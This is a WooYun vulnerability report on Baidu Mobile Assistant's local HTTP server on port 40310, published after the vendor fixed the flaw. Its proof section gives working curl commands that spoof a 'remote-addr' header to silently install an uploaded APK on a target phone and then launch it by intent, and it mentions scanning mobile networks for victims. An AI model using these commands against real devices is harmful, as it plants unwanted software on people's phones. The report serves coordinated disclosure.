漏洞概要
关注数(24)
关注此漏洞
漏洞标题:百度手机助手远程静默安装启动应用漏洞(3G/4G环境下远程种马)
相关厂商:百度
提交时间:2015-10-10 11:25
修复时间:2016-01-11 15:32
公开时间:2016-01-11 15:32
漏洞类型:远程代码执行
危害等级:高
自评Rank:10
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2015-10-10: 细节已通知厂商并且等待厂商处理中
2015-10-10: 厂商已经确认,细节仅向厂商公开
2015-10-13: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航)
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开
简要描述:
漏洞承接自http://www.wooyun.org/bugs/wooyun-2015-0145365
详细说明:
发现百度手机助手监听40310这么奇怪的端口,这里7777先按下不表.
前面的分析和 WooYun: 百度输入法安卓版存在远程获取信息控制用户行为漏洞(可恶意推入内容等4G网络内可找到目标) 差不多根据端口号找到 nano http server 的实现
但是和之前不一样的是多了一些验证,比如 http 头部remote-addr字段的验证
因为之前分析过百度输入法的 http server 所以很多结果就可以直接使用,比如获取目标坐标/IMEI/安装应用/远程发送 intent 等
获取坐标,其他信息获取可以参考 WooYun: 百度输入法安卓版存在远程获取信息控制用户行为漏洞(可恶意推入内容等4G网络内可找到目标)
但是其中又多了一些让人感兴趣的接口,比如uploadfile听着向上传文件,追踪下此调用类的实现看看到底在干什么.
从代码中可以看出这是这个接收文件的操作,和类的命令很一直了.但是继续跟踪其对install_type操作判断后的处理会发现.还有一个令人虎躯一震的功能 静默安装. (一般手机助手都会有一个静默安装功能是需要 root 权限的,这样可以帮助用户省去点击安装的操作.)
我们是否可以利用这个功能达到远程恶意安装应用的目的了而且加上远程发送 intent 的功能,不仅定向安装了应用而且攻击者可以随时随地启动应用.
漏洞证明:
远程上传静默安装应用
curl -F file=@1.apk -e http://m.baidu.com -H "remote-addr: 127.0.0.1" http://192.168.10.127:40310/uploadfile?install_type=all&callback=123&mcmdf=inapp_123&Filename=1.apk&
远程启动应用
curl -e http://m.baidu.com -H "remote-addr: 127.0.0.1" http://192.168.10.127:40310/sendintent?callback=123&mcmdf=inapp_123&intent=intent:#Intent;component=org.wooyun.wifikey/org.wooyun.wifikey.MainActivity;end;&
urlencode
curl -e http://m.baidu.com -H "remote-addr: 127.0.0.1" http://192.168.10.127:40310/sendintent?callback=123&mcmdf=inapp_123&intent=intent%3A%23Intent%3Bcomponent%3Dorg.wooyun.wifikey%2forg.wooyun.wifikey.MainActivity%3Bend%3B&
关于对 3/4G 网络扫描攻击可以参考 WooYun: 百度输入法安卓版存在远程获取信息控制用户行为漏洞(可恶意推入内容等4G网络内可找到目标) 以及小荷才露尖尖角的文章http://drops.wooyun.org/mobile/6973.等俺有测试卡了俺就扩大范围测测,嘿嘿.
注意视频中 wifikey 是 curl 后突然冒出来并启动的哟~
修复方案:
版权声明:转载请注明来源 瘦蛟舞@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2015-10-10 11:50
厂商回复:
感谢提交
最新状态:
暂无
漏洞评价:
评价
-
2015-10-10 11:27 |
梧桐雨 ( 核心白帽子 | Rank:1628 漏洞数:188 | 新年快乐!)
-
2015-10-10 11:34 |
xsser ( 普通白帽子 | Rank:267 漏洞数:20 | 当我又回首一切,这个世界会好吗?)
-
2015-10-10 11:35 |
phith0n ( 普通白帽子 | Rank:718 漏洞数:114 | 一个想当文人的黑客~)
-
2015-10-10 11:36 |
梧桐雨 ( 核心白帽子 | Rank:1628 漏洞数:188 | 新年快乐!)
-
2015-10-10 11:40 |
疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
-
2015-10-10 11:44 |
疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
-
2015-10-10 11:48 |
boooooom ( 普通白帽子 | Rank:473 漏洞数:51 | 我有一个好想法!)
-
2015-10-10 11:49 |
DNS ( 普通白帽子 | Rank:696 漏洞数:73 | root@qisec.com)
-
2015-10-10 11:49 |
爱上平顶山 ( 核心白帽子 | Rank:2942 漏洞数:582 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)
-
2015-10-10 11:50 |
子非海绵宝宝 ( 核心白帽子 | Rank:1278 漏洞数:128 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)
-
2015-10-10 12:26 |
qhwlpg ( 普通白帽子 | Rank:260 漏洞数:63 | 潜心代码审计。)
-
2015-10-10 12:46 |
luwikes ( 普通白帽子 | Rank:532 漏洞数:79 | 潜心学习~~~)
-
2015-10-10 13:17 |
secmap ( 普通白帽子 | Rank:1293 漏洞数:200 )
-
2015-10-10 13:41 |
小荷才露尖尖角 ( 普通白帽子 | Rank:111 漏洞数:14 | less is more)
-
2015-10-10 14:01 |
数据流 ( 普通白帽子 | Rank:738 漏洞数:93 | 没关系啊,我们还有音乐)
-
2015-10-10 14:22 |
onpu ( 普通白帽子 | Rank:167 漏洞数:37 | 勿忘初心)
-
2015-10-10 14:25 |
啊L川 ( 普通白帽子 | Rank:195 漏洞数:39 | 菜鸟 ,菜渣, 菜呀!)
-
2015-10-10 14:28 |
秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)
-
2015-10-10 14:34 |
梧桐树下 ( 普通白帽子 | Rank:553 漏洞数:89 | 一大波洞正在过来……)
-
2015-10-10 14:58 |
小不点 ( 核心白帽子 | Rank:1123 漏洞数:119 | 生命不息,刷洞不止.....)
-
2015-10-10 15:14 |
胡小树 ( 实习白帽子 | Rank:66 漏洞数:13 | 我是一颗小小树)
@啊L川 乌云的短消息提示大贴心了,只要关注就行了
-
2015-10-10 15:20 |
f4ckbaidu ( 普通白帽子 | Rank:223 漏洞数:28 | 开发真是日了狗了)
-
2015-10-10 16:15 |
封停 ( 实习白帽子 | Rank:38 漏洞数:8 | 求老中医指路)
-
2015-10-11 15:27 |
scanf ( 核心白帽子 | Rank:1334 漏洞数:195 | 。)
-
2015-10-13 14:22 |
番茄师傅 ( 普通白帽子 | Rank:346 漏洞数:92 | http://www.tomatoyu.com/)
-
2015-10-13 15:44 |
Damo ( 普通白帽子 | Rank:209 漏洞数:31 | 我只是喜欢看加菲猫而已ส็็็็็็็็...)
-
2015-10-13 16:57 |
Comer ( 普通白帽子 | Rank:336 漏洞数:40 | 关注安全 | 关注智能漏洞挖掘)
-
2015-10-15 10:17 |
大漠長河 ( 实习白帽子 | Rank:66 漏洞数:10 | ̷̸̨̀͒̏̃ͦ̈́̾( 天龙源景区枫叶正...)
-
2015-10-27 23:02 |
指尖的温度 ( 路人 | Rank:27 漏洞数:10 )
哎呀wocaowocao,丧(gan)心(de)病(piao)狂(liang)
-
2016-01-12 11:45 |
这只猪 ( 路人 | Rank:8 漏洞数:5 | )(2009年荣获CCAV首届挖洞大使称号)(★★★...)